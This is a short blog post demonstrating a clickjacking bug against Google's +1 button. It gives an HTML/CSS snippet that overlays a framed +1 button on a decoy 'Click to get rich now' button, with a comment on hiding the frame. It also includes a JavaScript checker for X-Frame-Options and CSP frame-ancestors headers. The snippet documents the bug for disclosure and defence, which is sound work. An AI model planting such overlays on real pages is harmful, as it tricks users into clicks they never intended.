Sunday, 16 July 2017

Google G+1 ClickJacking BUG





The previous basic introduction tutorial - https://www.youtube.com/watch?v=cbgNHnMsaPg&t=192s



The snippet -

<style>
iframe { /* iframe loaded from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top: 0;
  left: 0;
  opacity: 1; /* kept visible for the demo; a real overlay would use opacity: 0 */
  z-index: 1; /* stacks the frame above the decoy button */
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="https://plusone.google.com/_/+1/fastbutton?bsv&size=medium&hl=en-US&url=https://engineering.linkedin.com/security/our-private-bug-bounty-program-reducing-vulnerabilities-leveraging-expert-crowds"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div> 
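
Whether the frame in the snippet above renders at all is decided by the framed response's X-Frame-Options and Content-Security-Policy frame-ancestors headers. The following is an added example, not code from the original post: a simplified evaluator of those headers for a directly framed page, where the function names, origins and header values are constructed for illustration.

```javascript
// Added example: simplified check of anti-framing headers (not a full CSP parser).
// Assumes the page is framed directly by the top-level document (one ancestor).
const effPort = (u) => u.port || (u.protocol === "https:" ? "443" : "80");
const schemeOk = (want, got) => want === got || (want === "http:" && got === "https:");

// Match one frame-ancestors source expression against the embedding page's URL.
function sourceMatches(source, parent, self) {
  const src = source.toLowerCase();
  if (src === "*") return /^https?:$/.test(parent.protocol);
  if (src === "'self'") return parent.origin === self.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return schemeOk(src, parent.protocol);
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?(?:\/.*)?$/.exec(src);
  if (!m) return false; // 'none' and unparseable sources match nothing
  const [, scheme, wild, host, port] = m;
  if (!schemeOk(scheme ? scheme + ":" : self.protocol, parent.protocol)) return false;
  if (wild ? !parent.hostname.endsWith("." + host) : parent.hostname !== host) return false;
  if (port === "*") return true;
  return port ? effPort(parent) === port : parent.port === "";
}

// Would a browser let parentUrl embed the response served at frameUrl?
function framingAllowed(headers, frameUrl, parentUrl) {
  const self = new URL(frameUrl), parent = new URL(parentUrl);
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  let sawFrameAncestors = false;
  // Every policy that carries frame-ancestors must allow the parent.
  for (const policy of (h["content-security-policy"] || "").split(",")) {
    const directive = policy.split(";").map((d) => d.trim().split(/\s+/))
      .find((d) => d[0].toLowerCase() === "frame-ancestors");
    if (!directive) continue;
    sawFrameAncestors = true;
    if (!directive.slice(1).some((s) => sourceMatches(s, parent, self)))
      return { allowed: false, reason: "csp frame-ancestors" };
  }
  // When frame-ancestors is present, browsers ignore X-Frame-Options.
  if (sawFrameAncestors) return { allowed: true, reason: "csp frame-ancestors" };
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return { allowed: false, reason: "x-frame-options" };
  if (xfo === "SAMEORIGIN")
    return { allowed: parent.origin === self.origin, reason: "x-frame-options" };
  return { allowed: true, reason: "no effective anti-framing header" };
}

// Constructed sample: a widget endpoint framed by an unrelated site.
const FRAME = "https://widget.example/button";
const PARENT = "https://other-site.example/page";
console.log(framingAllowed({}, FRAME, PARENT));
console.log(framingAllowed({ "Content-Security-Policy": "frame-ancestors 'self'" }, FRAME, PARENT));
```

A response that returns `allowed: true` with the reason `no effective anti-framing header` is the case the snippet above relies on.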
